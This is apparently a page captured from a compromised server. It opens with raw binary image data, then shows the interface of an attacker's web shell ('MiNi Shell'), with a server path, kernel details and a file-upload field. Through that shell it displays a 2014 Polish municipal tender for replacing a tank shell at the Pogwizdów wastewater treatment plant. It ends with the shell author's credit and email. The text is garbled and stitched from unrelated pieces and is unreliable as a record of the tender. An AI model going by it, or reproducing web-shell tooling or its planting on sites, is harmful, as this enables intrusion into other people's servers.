JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140714/152895-N-2014.html

<p class="kh_header"><b>Hażlach: Dostawa i wymiana płaszcza zewnętrznego osadnika wtórnego bloku biologicznego oczyszczalni ścieków w Pogwizdowie</b><br>
<b>Numer ogłoszenia: 152895 - 2014; data zamieszczenia: 14.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Hażlach , ul. Główna 57, 43-419 Hażlach, woj. śląskie, tel. 033 8569555 w. 32, faks 033 8524211.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hazlach.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i wymiana płaszcza zewnętrznego osadnika wtórnego bloku biologicznego oczyszczalni ścieków w Pogwizdowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i wymiana płaszcza zewnętrznego osadnika wtórnego bloku biologicznego oczyszczalni ścieków w Pogwizdowie. 
Oczyszczalnia pracuje wg technologii DAUSER - Austria. 
Zakres zamówienia obejmuje: 
1.	Dostawę płaszcza zewnętrznego osadnika wtórnego,
2.	Opróżnienie zbiornika zespolonego i jego wyczyszczenie. 
3.	Demontaż  płaszcza zewnętrznego osadnika wtórnego,
4.	Montaż nowego płaszcza zewnętrznego osadnika wtórnego,
W momencie rozpoczęcia działań związanych z opróżnieniem zbiornika pomiędzy wykonawcą, a Gminą zostanie spisany protokół przekazania obiektu oczyszczalni ścieków w Pogwizdowie ul. Kolejowa 45. Wykonawca od momentu podpisania protokołu przekazania obiektu ponosi wszelką odpowiedzialność za wykonywane prace i ich skutki.  

Ad. 1)
Płaszcz zewnętrzny i wszystkie dodatkowe elementy winne  być wykonane ze stali odpornej na działanie ścieku - S 304 co należy potwierdzić stosownym atestem. Płaszcz zewnętrzny posiada średnicę 9 m i wysokość 6,2 m. Od  wysokości 2,5 m do dna zbiornika płaszcz zewnętrzny tworzy stożek do wnętrza zbiornika do średnicy 5 m. Wewnątrz osadnika wtórnego usytuowany jest stożek wewnętrzny o średnicy podstawy 4,3 m i wysokości 2 m, który wraz z dolną częścią  płaszcza zewnętrznego osadnika wtórnego tworzy tzw. studnię dortmundzką.  Przez powierzchnię płaszcza przechodzą przewody DN 300 mm syfonu i DN 250 mm odprowadzający ściek oczyszczony, które należy połączyć z nowymi elementami płaszcza. Płaszcz należy wyposażyć w 8 szt. podpór rur perforowanych odprowadzających ściek oczyszczony z osadnika wtórnego. Podpory te montowane są na wewnętrznej płaszczyźnie płaszcza w jego górnej części. Płaszcz zewnętrzny w dolnej części winien mieć klapę wyrównującą poziomy w zbiornikach, która to winna mieć możliwość otwarcia i zamknięcia z pomostu usytuowanego nad zbiornikiem. Stożek wewnętrzny znajdujący się w osadniku wtórnym nie podlega wymianie.
Załączone rysunki dokumentacji powykonawczej należy potraktować jako poglądowe. Szczegółowe rysunki techniczne są w posiadaniu dostawcy technologii.
Ad. 2) 
Opróżnianie zbiornika zespolonego Wykonawca może rozpocząć nie wcześniej niż po dostarczeniu kompletu elementów płaszcza zewnętrznego osadnika wtórnego na teren oczyszczalni ścieków.  
Wykonawca winien opróżnić zbiornik zespolony oczyszczalni ścieków o objętości ok. 1700 m3. Średnica zbiornika zespolonego wynosi 19 m, a głębokość zbiornika wynosi ok. 6 m. Po wyłączeniu oczyszczalni wodę nad osadową (ściek oczyszczony) należy odprowadzić do odbiornika. Osad należy przepompować do zbiornika osadu nadmiernego znajdującego się ok 5 metrów od zbiornika zespolonego celem sprasowania. Prasowanie osadu nadmiernego i jego wywóz oraz koszty z tym związane należą do Zamawiającego. Ewentualną pozostałość, która nie będzie się nadawać do prasowania należy przetransportować  na oczyszczalnię ścieków w Cieszynie ul. Motokrosowa 27, 43-400 Cieszyn. Odległość między oczyszczalnią w Pogwizdowie, a oczyszczalnią w Cieszynie wynosi 7 km. Oczyszczalnia w Cieszynie jest prowadzona jest przez Zakład Gospodarki Komunalnej w Cieszynie Sp. z o.o., ul. Słowicza 59, 43-400 Cieszyn. Zamawiający posiada zapewnienie odbioru ścieków i pozostałości zbiornika zespolonego, która nie będzie się nadawać do prasowania przez oczyszczalnię ścieków w Cieszynie ul. Motokrosowa 27, 43-400 Cieszyn. Koszty transportu i przyjęcia pozostałości przez oczyszczalnię w Cieszynie ponosi Wykonawca.  Po opróżnieniu zbiornika jego dno należy wyczyścić z zalegającego szlamu. Szlam należy umieścić w zbiorniku osadu nadmiernego który znajduje się w odległości 5 metrów od zbiornika zespolonego.  Pojemność zbiornika osadu nadmiernego wynosi 67 m3.
Od momentu rozpoczęcia opróżniania zbiornika do czasu ponownego uruchomienia oczyszczalni Wykonawca zobowiązany jest do odprowadzania podczyszczonego w flotowniku ścieku do odbiornika. Odprowadzanie ścieku podczyszczonego do odbiornika nie może przekroczyć 14 dni co wynika z pozwolenia wodnoprawnego nr WS.6223-28/05 z 21-04-2004 r. wraz ze zmianami z 26-06-2014 r. Analizy ścieków dotyczące redukcji zanieczyszczeń, w okresie prowadzenia naprawy, przeprowadzi Zamawiający na własny koszt. Odpowiedzialność za jakość ścieku odprowadzanego do odbiornika ponosi Zamawiający. 
Ad. 3) 
Wykonawca winien zdemontować płaszcz zewnętrzny osadnika wtórego i wytransportować jego elementy poza zbiornik. Miejsce składowania na terenie oczyszczalni  wskaże Zamawiający. Zdemontowane elementy pozostają własnością Zamawiającego.
Ad. 4)  
Montaż nowego płaszcza zewnętrznego osadnika wtórnego winien rozpocząć się bezpośrednio po zdemontowaniu  wymienianych elementów. 
Górną część zbiornika należy połączyć z 8 istniejącymi wspornikami poziomymi, i zabezpieczeniami linkowymi w ilości 4 szt. Należy również wypoziomować 2 leje ściągające zawiesinę pływającą z powierzchni osadnika wtórnego. 

Wykonawca powinien prowadzić prace w taki sposób aby ograniczyć do niezbędnego minimum okres wyłączenia z eksploatacji części oczyszczalni. Czas wyłączenia części oczyszczalni z eksploatacji nie może przekroczyć 14 dni. W razie przekroczenia 14 dniowego okresu wyłączenia części oczyszczalni z eksploatacji z winy Wykonawcy zobowiązany on będzie do transportu i zagospodarowania ścieków surowych dopływających do oczyszczalni na własny koszt. 
Zamawiający dopuszcza możliwość zapłaty za elementy płaszcza zewnętrznego osadnika wtórnego po jego dostarczeniu na teren oczyszczalni ścieków w Pogwizdowie i dostarczeniu stosownego atestu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1)	wykonania robot zamiennych w zakresie obejmującym:  
a)	zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą zakresu usługi, 
b)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny 
c)	zmiany w kolejności i terminach wykonywania usługi, 
d)	zmiany ilości usług lub dostaw w stosunku do opisu przedmiotu zamówienia, pod warunkiem że wynikają one z zasad wiedzy technicznej, albo zaniechania (rezygnacji) wykonania części robót objętych zamówieniem nie przekraczających 20% wynagrodzenia Wykonawcy 
2)	zmiany terminu wykonania robót spowodowanej: 
-złymi warunkami atmosferycznymi uniemożliwiającymi wykonanie robót w terminie przy czym przelotne opady deszczu nie są podstawą do zmiany terminu wykonania robót szczególnie jeżeli będą one występować w czasie wyłączenia części oczyszczalni z eksploatacji, 
-wystąpieniem robót uzupełniających lub dodatkowych.
3)	zmiany sposobu rozliczenia robot ze względu na zmianę obowiązującej stawki podatku VAT.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.92.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży odpis z właściwego rejestru (KRS) albo z wpisu do CEIDG wynikać będzie że wykonawca jest uprawniony do wykonywania działalności jakich żąda zamawiający</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 1 podobne zamówienie z podaniem jego wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. kalkulacja kosztów
2. harmonogram prac</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. Przewidziane zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany umowy nie mogą wykraczać poza określenie przedmiotu zamówienia zawarte w SIWZ. Zmiany, o których mowa mogą dotyczyć:
1)	wykonania robot zamiennych w zakresie obejmującym:  
a)	zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą zakresu usługi, 
b)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny 
c)	zmiany w kolejności i terminach wykonywania usługi, 
d)	zmiany ilości usług lub dostaw w stosunku do opisu przedmiotu zamówienia, pod warunkiem że wynikają one z zasad wiedzy technicznej, albo zaniechania (rezygnacji) wykonania części robót objętych zamówieniem nie przekraczających 20% wynagrodzenia Wykonawcy 
2)	zmiany terminu wykonania robót spowodowanej: 
-złymi warunkami atmosferycznymi uniemożliwiającymi wykonanie robót w terminie przy czym przelotne opady deszczu nie są podstawą do zmiany terminu wykonania robót szczególnie jeżeli będą one występować w czasie wyłączenia części oczyszczalni z eksploatacji, 
-wystąpieniem robót uzupełniających lub dodatkowych.
3)	zmiany sposobu rozliczenia robot ze względu na zmianę obowiązującej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hazlach.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Hażlach, ul. Główna 57, 43-419 Hażlach.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2014 godzina 09:00, miejsce: Urząd Gminy Hażlach, ul. Główna 57, 43-419 Hażlach, pok. nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com